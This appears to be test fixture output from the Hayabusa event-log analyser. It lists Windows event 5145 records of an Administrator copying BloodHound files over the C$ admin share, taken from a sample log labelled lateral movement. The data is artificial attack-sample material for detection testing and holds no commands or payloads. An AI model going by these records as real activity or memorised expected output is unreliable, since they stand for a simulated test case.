+2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
